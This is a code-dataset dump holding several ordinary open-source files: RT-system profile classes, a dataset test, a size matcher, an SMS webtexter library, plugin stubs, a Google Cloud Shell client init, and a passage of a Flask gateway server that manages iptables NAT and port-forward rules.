Column summary (type and value range per column):

| Column | Type | Values |
|---|---|---|
| repo_name | string | lengths 5 to 92 |
| path | string | lengths 4 to 232 |
| copies | string | 19 classes |
| size | string | lengths 4 to 7 |
| content | string | lengths 721 to 1.04M |
| license | string | 15 classes |
| hash | int64 | -9,223,277,421,539,062,000 to 9,223,102,107B |
| line_mean | float64 | 6.51 to 99.9 |
| line_max | int64 | 15 to 997 |
| alpha_frac | float64 | 0.25 to 0.97 |
| autogenerated | bool | 1 class |

| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated |
|---|---|---|---|---|---|---|---|---|---|---|
| gbiggs/rtsprofile | rtsprofile/message_sending.py | 1 | 20553 |
# -*- Python -*-
# -*- coding: utf-8 -*-
'''rtsprofile
Copyright (C) 2009-2015
Geoffrey Biggs
RT-Synthesis Research Group
Intelligent Systems Research Institute,
National Institute of Advanced Industrial Science and Technology (AIST),
Japan
All rights reserved.
Licensed under the GNU Lesser General Public License version 3.
http://www.gnu.org/licenses/lgpl-3.0.en.html
File: message_sending.py
Objects for the message sending interface.
'''
__version__ = '$Revision: $'
# $Source$
from rtsprofile import RTS_NS, RTS_NS_S, RTS_EXT_NS, RTS_EXT_NS_S, \
RTS_EXT_NS_YAML, XSI_NS, XSI_NS_S
from rtsprofile.exceptions import InvalidParticipantNodeError
from rtsprofile.targets import TargetExecutionContext
from rtsprofile.utils import get_direct_child_elements_xml, \
indent_string, validate_attribute, \
string_types
##############################################################################
## MessageSending base object
class MessageSending(object):
'''Defines the orderings and conditions of components in the RT system for
various actions.
'''
def __init__(self, targets=[]):
'''@param targets Orderings and conditions.'''
validate_attribute(targets, 'message_sending.Targets',
expected_type=list, required=False)
self._targets = targets
def __str__(self):
result = self.__class__.__name__ + '\n'
if self.targets:
result += 'Targets:\n'
for t in self.targets:
result += '{0}\n'.format(indent_string(str(t)))
return result[:-1] # Lop off the last new line
@property
def targets(self):
'''Orderings and conditions.'''
return self._targets
@targets.setter
def targets(self, targets):
validate_attribute(targets, 'message_sending.targets',
expected_type=list, required=False)
self._targets = targets
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a message sending object
into this object.
'''
self._targets = []
for c in node.getElementsByTagNameNS(RTS_NS, 'targets'):
if c.getElementsByTagNameNS(RTS_NS, 'WaitTime'):
new_target = WaitTime()
elif c.getElementsByTagNameNS(RTS_NS, 'Preceding'):
new_target = Preceding()
else:
new_target = Condition()
new_target.parse_xml_node(c)
self._targets.append(new_target)
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a message sending object into this
object.
'''
self._targets = []
if 'targets' in y:
for t in y['targets']:
if 'waitTime' in t['condition']:
new_target = WaitTime()
elif 'preceding' in t['condition']:
new_target = Preceding()
else:
new_target = Condition()
new_target.parse_yaml(t)
self._targets.append(new_target)
return self
def save_xml(self, doc, element):
'''Save this message_sending object into an xml.dom.Element object.'''
for cond in self._targets:
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'targets')
new_element.setAttributeNS(XSI_NS, XSI_NS_S + 'type', 'rtsExt:condition_ext')
cond.save_xml(doc, new_element)
element.appendChild(new_element)
def to_dict(self):
'''Save this message sending object into a dictionary.'''
targets = []
for cond in self._targets:
targets.append(cond.to_dict())
if targets:
return {'targets': targets}
else:
return {}
##############################################################################
## StartUp object
class StartUp(MessageSending):
'''Specifies the start order and conditions of components when the RT
system is started.
'''
pass
##############################################################################
## ShutDown object
class ShutDown(MessageSending):
'''Specifies the stop order and conditions of components when the RT system
is stopped.
'''
pass
##############################################################################
## Activation object
class Activation(MessageSending):
'''Specifies the activation order and conditions of components when the RT
system is activated.
'''
pass
##############################################################################
## Deactivation object
class Deactivation(MessageSending):
'''Specifies the deactivation order and conditions of components when the RT
system is deactivated.
'''
pass
##############################################################################
## Resetting object
class Resetting(MessageSending):
'''Specifies the reset order and conditions of components when the RT
system is reset.
'''
pass
##############################################################################
## Initialize object
class Initialize(MessageSending):
'''Specifies the initialisation order and conditions of components when the
RT system is initialised.
'''
pass
##############################################################################
## Finalize object
class Finalize(MessageSending):
'''Specifies the finalisation order and conditions of components when the
RT system is finalised.
'''
pass
##############################################################################
## Condition base object
class Condition(object):
'''Specifies execution orderings and conditions for RT components in the RT
system.
Execution conditions can include the time to wait before executing and
order of precedence for components. The involved RT component is specified
using @ref TargetExecutionContext.
'''
def __init__(self, sequence=0, target_component=TargetExecutionContext()):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
'''
validate_attribute(sequence, 'conditions.sequence',
expected_type=int, required=False)
self._sequence = sequence
validate_attribute(target_component, 'conditions.TargetComponent',
expected_type=TargetExecutionContext,
required=True)
self._target_component = target_component
self._properties = {}
def __str__(self):
result = 'Sequence: {0}\nTargetEC:\n{1}\n'.format(self.sequence,
indent_string(str(self.target_component)))
if self.properties:
result += 'Properties:\n'
for p in self.properties:
result += ' {0}: {1}\n'.format(p, self.properties[p])
return result[:-1] # Lop off the last new line
@property
def sequence(self):
'''The execution order of the target components for the various
actions.
'''
return self._sequence
@sequence.setter
def sequence(self, sequence):
validate_attribute(sequence, 'conditions.sequence',
expected_type=int, required=False)
self._sequence = sequence
@property
def target_component(self):
'''Target component of the condition.'''
return self._target_component
@target_component.setter
def target_component(self, target_component):
validate_attribute(target_component, 'conditions.TargetComponent',
expected_type=TargetExecutionContext,
required=True)
self._target_component = target_component
@property
def properties(self):
'''Miscellaneous properties.
Stores key/value pair properties.
Part of the extended profile.
'''
return self._properties
@properties.setter
def properties(self, properties):
validate_attribute(properties, 'conditions.ext.Properties',
expected_type=dict, required=False)
self._properties = properties
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a condition into this
object.
'''
self.sequence = int(node.getAttributeNS(RTS_NS, 'sequence'))
c = node.getElementsByTagNameNS(RTS_NS, 'TargetComponent')
if c.length != 1:
raise InvalidParticipantNodeError
self.target_component = TargetExecutionContext().parse_xml_node(c[0])
for c in get_direct_child_elements_xml(node, prefix=RTS_EXT_NS,
local_name='Properties'):
name, value = parse_properties_xml(c)
self._properties[name] = value
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a condition into this object.'''
self.sequence = int(y['sequence'])
self.target_component = \
TargetExecutionContext().parse_yaml(y['targetComponent'])
if RTS_EXT_NS_YAML + 'properties' in y:
for p in y.get(RTS_EXT_NS_YAML + 'properties'):
if 'value' in p:
value = p['value']
else:
value = None
self._properties[p['name']] = value
return self
def save_xml(self, doc, element):
'''Save this condition into an xml.dom.Element object.'''
element.setAttributeNS(RTS_NS, RTS_NS_S + 'sequence',
str(self.sequence))
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'TargetComponent')
self.target_component.save_xml(doc, new_element)
element.appendChild(new_element)
for p in self.properties:
new_prop_element = doc.createElementNS(RTS_EXT_NS,
RTS_EXT_NS_S + 'Properties')
properties_to_xml(new_prop_element, p, self.properties[p])
element.appendChild(new_prop_element)
def to_dict(self):
'''Save this condition into a dictionary.'''
d = {'sequence': self.sequence,
'targetComponent': self.target_component.to_dict()}
props = []
for name in self.properties:
p = {'name': name}
if self.properties[name]:
p['value'] = str(self.properties[name])
props.append(p)
if props:
d[RTS_EXT_NS_YAML + 'properties'] = props
return d
##############################################################################
## Preceding object
class Preceding(Condition):
'''Specifies that the target RT component should precede other RT
components that are part of the same action (e.g. activation) when that
action is executed.
'''
def __init__(self, sequence=0, target_component=TargetExecutionContext(),
timeout=0, sending_timing='', preceding_components=[]):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
@param timeout Status check timeout.
@type timeout int
@param sending_timing Timing for executing actions.
@type sending_timing str
@param preceding_components Preceding components of the condition.
@type preceding components list(TargetExecutionContext)
'''
super(Preceding, self).__init__(sequence, target_component)
validate_attribute(timeout, 'preceding.timeout',
expected_type=int, required=False)
self._timeout = timeout
validate_attribute(sending_timing, 'preceding.sendingTiming',
expected_type=string_types(), required=False)
self._sending_timing = sending_timing
validate_attribute(preceding_components,
'preceding.PrecedingComponents',
expected_type=list, required=False)
self._preceding_components = preceding_components
def __str__(self):
result = 'Timeout: {0}\nSending timing: {1}\n{2}'.format(self.timeout,
self.sending_timing, Condition.__str__(self))
if self.preceding_components:
for pc in self.preceding_components:
result += '\nPreceding component:\n{0}'.format(\
indent_string(str(pc)))
return result
@property
def timeout(self):
'''Time out for checking if the target component has executed the
action successfully.
Can be zero. Specified in milliseconds.
'''
return self._timeout
@timeout.setter
def timeout(self, timeout):
validate_attribute(timeout, 'preceding.timeout',
expected_type=int, required=False)
self._timeout = timeout
@property
def sending_timing(self):
'''Timing for executing actions.
Either wait for the preceding RT component to finish executing the
action (specified by "SYNC"), or execute the action without waiting for
the preceding RT component to finish (specified by "ASYNC"). When not
specified, the first option will be assumed.
'''
return self._sending_timing
@sending_timing.setter
def sending_timing(self, sending_timing):
validate_attribute(sending_timing, 'preceding.sendingTiming',
expected_type=string_types(), required=False)
self._sending_timing = sending_timing
@property
def preceding_components(self):
'''Preceding components of this condition.'''
return self._preceding_components
@preceding_components.setter
def preceding_components(self, preceding_components):
validate_attribute(preceding_components, 'preceding.PrecedingComponents',
expected_type=list, required=False)
self._preceding_components = preceding_components
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a preceding condition into
this object.
'''
super(Preceding, self).parse_xml_node(node)
p_nodes = node.getElementsByTagNameNS(RTS_NS, 'Preceding')
if p_nodes.length != 1:
raise InvalidParticipantNodeError
p_node = p_nodes[0]
if p_node.hasAttributeNS(RTS_NS, 'timeout'):
self.timeout = int(p_node.getAttributeNS(RTS_NS, 'timeout'))
else:
self.timeout = 0
if p_node.hasAttributeNS(RTS_NS, 'sendingTiming'):
self.sending_timing = p_node.getAttributeNS(RTS_NS, 'sendingTiming')
else:
self.sending_timing = 'ASYNC'
self._preceding_components = []
for c in p_node.getElementsByTagNameNS(RTS_NS, 'PrecedingComponents'):
self._preceding_components.append(TargetExecutionContext().parse_xml_node(c))
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a preceding condition into this
object.
'''
super(Preceding, self).parse_yaml(y)
c = y['condition']['preceding']
if 'timeout' in c:
self.timeout = int(c['timeout'])
else:
self.timeout = 0
if 'sendingTiming' in c:
self.sending_timing = c['sendingTiming']
else:
self.sending_timing = 'ASYNC'
self._preceding_components = []
if 'precedingComponents' in c:
for p in c.get('precedingComponents'):
self._preceding_components.append(TargetExecutionContext().parse_yaml(p))
return self
def save_xml(self, doc, element):
'''Save this preceding condition into an xml.dom.Element object.'''
super(Preceding, self).save_xml(doc, element)
pre_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'Preceding')
if self.timeout:
pre_element.setAttributeNS(RTS_NS, RTS_NS_S + 'timeout',
str(self.timeout))
if self.sending_timing:
pre_element.setAttributeNS(RTS_NS, RTS_NS_S + 'sendingTiming',
self.sending_timing)
for pc in self._preceding_components:
new_element = doc.createElementNS(RTS_NS,
RTS_NS_S + 'PrecedingComponents')
pc.save_xml(doc, new_element)
pre_element.appendChild(new_element)
element.appendChild(pre_element)
def to_dict(self):
'''Save this preceding condition into a dictionary.'''
d = super(Preceding, self).to_dict()
e = {}
if self.timeout != 0:
e['timeout'] = self.timeout
if self.sending_timing:
e['sendingTiming'] = self.sending_timing
pcs = []
for pc in self._preceding_components:
pcs.append(pc.to_dict())
if pcs:
e['precedingComponents'] = pcs
d['condition'] = {'preceding': e}
return d
##############################################################################
## WaitTime object
class WaitTime(Condition):
'''Specifies the time to wait before executing the specified action on the
target RT component. After the action command is received by the RT
component, it will wait the specified length of time before executing it.
'''
def __init__(self, wait_time=0, sequence=0,
target_component=TargetExecutionContext()):
'''Constructor.
@param sequence Execution order of the target component.
@type sequence int
@param target_component The target of the condition.
@type target_component TargetComponent
@param wait_time The length of time to wait, in milliseconds.
@type wait_time int
'''
super(WaitTime, self).__init__(sequence, target_component)
validate_attribute(wait_time, 'wait_time.waitTime',
expected_type=int, required=False)
self._wait_time = wait_time
def __str__(self):
return 'Wait time: {0}\n{1}'.format(self.wait_time,
Condition.__str__(self))
@property
def wait_time(self):
'''The length of time to wait before executing the specified action.
In milliseconds.
'''
return self._wait_time
@wait_time.setter
def wait_time(self, wait_time):
validate_attribute(wait_time, 'wait_time.waitTime',
expected_type=int, required=False)
self._wait_time = wait_time
def parse_xml_node(self, node):
'''Parse an xml.dom Node object representing a wait_time condition into
this object.
'''
super(WaitTime, self).parse_xml_node(node)
wait_time_nodes = node.getElementsByTagNameNS(RTS_NS, 'WaitTime')
if wait_time_nodes.length != 1:
raise InvalidParticipantNodeError
self.wait_time = int(wait_time_nodes[0].getAttributeNS(RTS_NS,
'waitTime'))
return self
def parse_yaml(self, y):
'''Parse a YAML specification of a wait_time condition into this
object.
'''
super(WaitTime, self).parse_yaml(y)
self.wait_time = int(y['condition']['waitTime']['waitTime'])
return self
def save_xml(self, doc, element):
'''Save this wait_time condition into an xml.dom.Element object.'''
super(WaitTime, self).save_xml(doc, element)
new_element = doc.createElementNS(RTS_NS, RTS_NS_S + 'WaitTime')
new_element.setAttributeNS(RTS_NS, RTS_NS_S + 'waitTime',
str(self.wait_time))
element.appendChild(new_element)
def to_dict(self):
'''Save this wait_time condition into a dictionary.'''
d = super(WaitTime, self).to_dict()
d['condition'] = {'waitTime': {'waitTime': self.wait_time}}
return d
# vim: tw=79
| lgpl-3.0 | 9,126,888,891,478,318,000 | 33.60101 | 89 | 0.57432 | false |
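The row above carries rtsprofile's message-sending conditions (WaitTime delays, Preceding with SYNC/ASYNC timing). Below is a minimal, hedged sketch of how those classes compose; it assumes the rtsprofile package is importable and that TargetExecutionContext takes no constructor arguments, as its use as a default parameter in the file suggests.

```python
# Hedged sketch (not part of the dataset row): build an Activation ordering
# from a wait-time condition and a preceding-component condition, then
# serialise it with the to_dict() methods shown above.
from rtsprofile.message_sending import Activation, Preceding, WaitTime
from rtsprofile.targets import TargetExecutionContext

# Wait 500 ms before activating the target component (sequence 1).
wait = WaitTime(wait_time=500, sequence=1,
                target_component=TargetExecutionContext())

# Require a preceding component to finish first, waiting up to 3000 ms (SYNC).
precede = Preceding(sequence=2, target_component=TargetExecutionContext(),
                    timeout=3000, sending_timing='SYNC')

activation = Activation(targets=[wait, precede])
print(activation.to_dict())
```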
| google/uncertainty-baselines | uncertainty_baselines/datasets/datasets_test.py | 1 | 1049 |
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for get_dataset()."""
from absl.testing import parameterized
import tensorflow as tf
import uncertainty_baselines as ub
class DatasetsTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.parameters('mnist', 'glue/cola')
def testGetDataset(self, name):
dataset = ub.datasets.get(name, split='train')
self.assertEqual(dataset.name, name)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 3,725,327,766,936,208,400 | 31.78125 | 74 | 0.744519 | false |
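The test above asserts that ub.datasets.get returns a dataset whose name matches the requested one. Here is a standalone sketch of that call outside the test harness; it assumes the uncertainty_baselines package and the underlying TFDS data are available locally.

```python
# Hedged sketch mirroring DatasetsTest.testGetDataset above.
import uncertainty_baselines as ub

dataset = ub.datasets.get('mnist', split='train')
print(dataset.name)  # the test above expects this to equal 'mnist'
```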
| kevinarpe/kevinarpe-rambutan3 | rambutan3/check_args/collection/RRangeSizeMatcher.py | 1 | 2658 |
from rambutan3 import RArgs
from rambutan3.check_args.base.RAbstractTypeMatcher import RAbstractTypeMatcher
from rambutan3.check_args.base.traverse.RTypeMatcherError import RTypeMatcherError
from rambutan3.string.RMessageText import RMessageText
class RRangeSizeMatcher(RAbstractTypeMatcher):
"""
This class is fully tested.
"""
# noinspection PyMissingConstructor
def __init__(self, *, min_size: int=-1, max_size: int=-1):
self.__check_sizes(min_size=min_size, max_size=max_size)
self.__min_size = min_size
self.__max_size = max_size
@staticmethod
def __check_sizes(*, min_size: int, max_size: int):
RArgs.check_is_instance(min_size, int, 'min_size')
RArgs.check_is_instance(max_size, int, 'max_size')
if -1 == min_size and -1 == max_size:
raise ValueError("Both args 'min_size' and 'max_size' are -1")
if min_size < -1:
raise ValueError("Arg 'min_size' must be >= -1: {}".format(min_size))
if max_size < -1:
raise ValueError("Arg 'max_size' must be >= -1: {}".format(max_size))
if -1 != min_size and -1 != max_size and min_size > max_size:
raise ValueError("Arg 'min_size' > arg 'max_size': {} > {}".format(min_size, max_size))
# @override
def matches(self, collection, matcher_error: RTypeMatcherError=None) -> bool:
try:
size = len(collection)
except TypeError as e:
# TypeError: object of type 'xyz' has no len()
if matcher_error:
matcher_error.add_failed_match(self, collection, RMessageText(str(e)))
return False
if (-1 == self.__min_size or size >= self.__min_size) \
and (-1 == self.__max_size or size <= self.__max_size):
return True
if matcher_error:
matcher_error.add_failed_match(self, collection, RMessageText('Actual size is {}'.format(size)))
return False
# @override
def __eq__(self, other) -> bool:
if not isinstance(other, RRangeSizeMatcher):
return False
x = ((self.__min_size == other.__min_size) and (self.__max_size == other.__max_size))
return x
# @override
def __hash__(self) -> int:
x = hash((self.__min_size, self.__max_size))
return x
# @override
def __str__(self):
x = ''
if -1 != self.__min_size:
x += 'size >= {}'.format(self.__min_size)
if -1 != self.__max_size:
if x:
x += ' and '
x += 'size <= {}'.format(self.__max_size)
x = ' where ' + x
return x
| gpl-3.0 | -1,375,920,728,825,385,700 | 33.973684 | 108 | 0.565839 | false |
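A short usage sketch for RRangeSizeMatcher above, assuming the rambutan3 package layout shown in its own imports; a min_size or max_size of -1 leaves that side of the range unbounded.

```python
# Hedged sketch: size-range matching as implemented by RRangeSizeMatcher above.
from rambutan3.check_args.collection.RRangeSizeMatcher import RRangeSizeMatcher

matcher = RRangeSizeMatcher(min_size=2, max_size=4)
print(matcher.matches([1, 2, 3]))   # True: len() is 3, inside [2, 4]
print(matcher.matches([1]))         # False: too small
print(matcher.matches(42))          # False: an int has no len()
print(matcher)                      # ' where size >= 2 and size <= 4'
```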
| timmyomahony/python-parsnip | parsnip/__init__.py | 1 | 4250 |
import urllib
import urllib2
import cookielib
from lxml import etree
DEBUG = False
VERSION = "0.0.1"
import logging
logger = logging.getLogger(__name__)
if DEBUG:
logging.basicConfig(level=logging.DEBUG)
from parsnip import utils
class Webtext(object):
"""
Represents a webtext to be sent to a list of recipients. It does some simple
validation and formatting on the provided message and recipients.
"""
def __init__(self, message, recipients):
if not isinstance(message, str):
raise AttributeError("The message must be a string")
else:
if len(message) == 0:
raise AttributeError("The message string provided was empty")
self.message = utils.make_string_safe(message)
if not isinstance(recipients, list):
try:
recipients = utils.csv_to_list(recipients)
except:
raise AttributeError("Provided recipients were not in a list and could not be converted.")
recipients = utils.clean_list(recipients)
if len(recipients) == 0:
raise AttributeError("No recipients in the list")
self.recipients = recipients
class BaseConnection(object):
"""
A wrapper around urllib concerned with sending and receiving messages to the mobile operators'
websites. It is also responsible for managing cookies.
"""
def __init__(self):
self.cookies = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookies))
def send(self,url, data=None, headers=None):
"""
"""
if data:
data = urllib.urlencode(data)
if not headers:
headers = {
"Referer":"http://www.google.com",
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0) Gecko/20100101 Firefox/4.0"
}
request = urllib2.Request(url=url, data=data, headers=headers)
return self.opener.open(request).read()
class BaseWebtexter(object):
""" """
MAX_LENGTH = 128
MAX_RECIPIENTS = 24
def __init__(self, phone_number, pin, *args, **kwargs):
self.phone_number = phone_number
self.pin = pin
self.remaining_webtexts = None
self.connection = BaseConnection()
def login(self):
raise NotImplementedError()
def logout(self):
if self.LOGOUT_POST:
self.connection.send(self.LOGOUT_POST)
self.connection.cookies.clear()
def _do_send(self, message_chunk, recipient_list_chunk):
"""
This should be overwritten to provide the actual network specific logic for sending a single message.
Parameters:
- message_chunk : is a string that is less than `self.MAX_LENGTH` chars
- recipient_list_chunk : is a list with fewer than `self.MAX_RECIPIENTS` entries
"""
raise NotImplementedError()
def send(self, message, recipients):
"""
Front-facing sending wrapper to send a message to a list (or comma separated string) of phone numbers. This
method automatically breaks the message and recipient list into smaller chunks if they are bigger than the
network provider can deal with (depending on what has been set in self.MAX_LENGTH and self.MAX_RECIPIENTS)
Parameters:
- message : a string of any length
- recipients : a comma separated string or a list of strings containing the phone numbers to send to.
"""
webtext = Webtext(message, recipients)
for message_chunk in utils.chunk(webtext.message, self.MAX_LENGTH):
for recipient_chunk in utils.chunk(webtext.recipients, self.MAX_RECIPIENTS):
self._do_send(message_chunk, recipient_chunk)
return True
def get_remaining_webtexts(self):
raise NotImplementedError()
def __unicode__(self):
return u"%s-%s" %(self.is_operator, self.phone_number)
def __str__(self):
return u"%s-%s" %(self.is_operator, self.phone_number)
import operators
def get_webtexter(network_name, phone_number, pin):
"""
Factory function to create webtexters given a string representing the operator (e.g. 'Meteor'/'O2')
"""
for cls in BaseWebtexter.__subclasses__():
if cls.is_operator(unicode(network_name)):
return cls(phone_number, pin)
raise ValueError, "Webtexter for %s has not been implemented" % network_name
| mit | 8,747,260,817,803,172,000 | 33 | 111 | 0.702588 | false |
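The send() docstring above describes chunking long messages and large recipient lists before delivery. A hedged end-to-end sketch of the factory and send path follows; 'Meteor', the phone number and the PIN are placeholders, and a matching BaseWebtexter subclass is assumed to exist in parsnip.operators.

```python
# Hedged sketch of the public API shown above; all values are placeholders.
from parsnip import get_webtexter

webtexter = get_webtexter("Meteor", "0851234567", "1234")
webtexter.login()                     # implemented by the operator subclass
webtexter.send("Hello from parsnip",  # chunked to MAX_LENGTH / MAX_RECIPIENTS
               ["0869876543", "0861112223"])
webtexter.logout()
```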
| Hernanarce/pelisalacarta | python/version-command-line/platformcode/platformtools.py | 1 | 1188 |
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# platformtools
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
from core import config
def dialog_ok(heading, line1, line2="", line3=""):
return True
def dialog_notification(heading, message, icon=0, time=5000, sound=True):
pass
def dialog_yesno(heading, line1, line2="", line3="", nolabel="No", yeslabel="Si", autoclose=""):
return True
def dialog_select(heading, list):
return -1
def dialog_progress(heading, line1, line2="", line3=""):
return None
def dialog_progress_bg(heading, message=""):
return None
def dialog_input(default="", heading="", hidden=False):
return None
def dialog_numeric(type, heading, default=""):
return None
def itemlist_refresh():
pass
def itemlist_update(item):
pass
def render_items(itemlist, parentitem):
pass
def is_playing():
return None
def play_video(item):
pass
def show_channel_settings(list_controls=None, dict_values=None, caption="", callback=None, item=None):
return None
def show_recaptcha(key, referer):
return None
| gpl-3.0 | 9,129,338,694,733,797,000 | 21.433962 | 102 | 0.637205 | false |
| googleapis/python-shell | google/cloud/shell/__init__.py | 1 | 2691 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.shell_v1.services.cloud_shell_service.client import (
CloudShellServiceClient,
)
from google.cloud.shell_v1.services.cloud_shell_service.async_client import (
CloudShellServiceAsyncClient,
)
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyMetadata
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyRequest
from google.cloud.shell_v1.types.cloudshell import AddPublicKeyResponse
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import AuthorizeEnvironmentResponse
from google.cloud.shell_v1.types.cloudshell import CloudShellErrorDetails
from google.cloud.shell_v1.types.cloudshell import CreateEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import DeleteEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import Environment
from google.cloud.shell_v1.types.cloudshell import GetEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyMetadata
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyRequest
from google.cloud.shell_v1.types.cloudshell import RemovePublicKeyResponse
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentMetadata
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentRequest
from google.cloud.shell_v1.types.cloudshell import StartEnvironmentResponse
__all__ = (
"CloudShellServiceClient",
"CloudShellServiceAsyncClient",
"AddPublicKeyMetadata",
"AddPublicKeyRequest",
"AddPublicKeyResponse",
"AuthorizeEnvironmentMetadata",
"AuthorizeEnvironmentRequest",
"AuthorizeEnvironmentResponse",
"CloudShellErrorDetails",
"CreateEnvironmentMetadata",
"DeleteEnvironmentMetadata",
"Environment",
"GetEnvironmentRequest",
"RemovePublicKeyMetadata",
"RemovePublicKeyRequest",
"RemovePublicKeyResponse",
"StartEnvironmentMetadata",
"StartEnvironmentRequest",
"StartEnvironmentResponse",
)
| apache-2.0 | 7,066,398,266,885,760,000 | 42.403226 | 79 | 0.808993 | false |
| rahulbahal7/cloud-gateway | server.py | 1 | 7070 |
from flask import Flask, render_template, request, g
import os
import subprocess
import requests
import sqlite3
import yaml
app = Flask(__name__)
dnat_cmd = "sudo iptables -t nat %s PREROUTING -d %s -j DNAT --to-destination %s"
port_fwd_cmd = "sudo iptables -t nat %s PREROUTING -p %s -d %s --dport %s -j DNAT --to-destination %s"
internet_cmd = "sudo iptables -t nat %s POSTROUTING ! -d %d -j MASQUERADE"
internet_tag_file = "./internet_conn_on"
# Override default database setting
net_config = yaml.load(open('config.yaml').read())
app.config.update(dict(
DATABASE = os.path.join(app.root_path, 'database.db'),
DEBUG = True,
SLAVE_URL = ("http://%s:%s") % (net_config["VcgIp"], net_config["VcgServicePort"])
))
#########################
# DATABASE RELATED CODE #
#########################
def init_db():
if not os.path.isfile(app.config['DATABASE']):
# create database file
path, file_name = os.path.split(app.config['DATABASE'])
if not os.path.isdir(path):
os.makedirs(path)
open(file_name, 'a').close()
# init tables
conn = sqlite3.connect(app.config['DATABASE'])
cur = conn.cursor()
cur.execute("create table dnats (ori_ip text, real_ip text)")
cur.execute("create table port_fwds (dport text, dst text, protocol text)")
conn.commit()
conn.close()
def connect_to_database():
return sqlite3.connect(app.config['DATABASE'])
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = connect_to_database()
return db
def execute_sql(query, params):
conn = get_db()
conn.cursor().execute(query, params)
conn.commit()
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
#############
# HOME PAGE #
#############
@app.route("/")
def index():
# return all exsiting dnat rules
dnats = get_db().cursor().execute("SELECT * FROM dnats")
# return all existing port forwarding rules
port_fwds = get_db().cursor().execute("SELECT * FROM port_fwds")
return render_template("index.html", dnats=dnats, port_fwds=port_fwds, internet_state=str(internet_on()))
@app.route("/dnat", methods=['GET', 'POST', 'DELETE'])
def dnat():
if request.method == 'GET':
cur = get_db().cursor()
return cur.execute("SELECT * FROM dnats")
elif request.method == 'POST':
ori_ip = request.form['ori_ip']
real_ip = request.form['real_ip']
# send post request to the slave vcg
# rsp = requests.post(app.config["SLAVE_URL"] + '/dnat', data = request.form)
# # if fail
# if rsp.content != "succ":
# return rsp.content
# execute rule add locally
# write new rules into database
#dnats = get_db().cursor().execute("SELECT * FROM dnats")
#port_fwds = get_db().cursor().execute("SELECT * FROM port_fwds")
execute_sql('insert into dnats values (?,?)', (ori_ip, real_ip,))
#return render_template("index.html",dnats=dnats, port_fwds=port_fwds)
return "success"
elif request.method == 'DELETE':
ori_ip = request.form['ori_ip']
real_ip = request.form['real_ip']
# params = {"ori_ip" : ori_ip, "real_ip" : real_ip}
# send delete request to slave vcg
# rsp = requests.delete(app.config["SLAVE_URL"] + '/dnat', data = params)
# if fail
# if rsp.content != "succ":
# return rsp.content
# execute rule delete locally
# del_dnat(ori_ip, real_ip)
# del_arp(real_ip)
# print params
# delete rule into database
execute_sql('DELETE FROM dnats WHERE ori_ip=? and real_ip=?', (ori_ip, real_ip,))
return "success"
@app.route("/port_fwd", methods=['GET', 'POST', 'DELETE'])
def port_fwd():
if request.method == 'POST':
try:
dport = request.form['dport']
dst = request.form['dst']
protocol = request.form['protocol']
# print request.form
add_port_fwd(protocol, dport, dst)
# rule into database
execute_sql('insert into port_fwds values (?, ?, ?)', (dport, dst, protocol))
return "success"
except Exception as e:
return str(e)
elif request.method == 'DELETE':
try:
print request.form
dport = request.form['dport']
dst = request.form['dst']
protocol = request.form['protocol'].strip()
#del_port_fwd(proto, dport, dst)
execute_sql('DELETE FROM port_fwds WHERE dport=? and dst=? and protocol=?', (dport, dst, protocol,))
print "haha1"
return "success"
except Exception as e:
return str(e)
@app.route("/toggle_internet", methods=['GET', 'POST'])
def toggle_internet():
if request.method == 'GET':
cur = get_db().cursor()
return cur.execute("SELECT * FROM internet")
elif request.method == 'POST':
try:
flag = request.form['flag']
if flag=="True": disable_internet()
else: enable_internet()
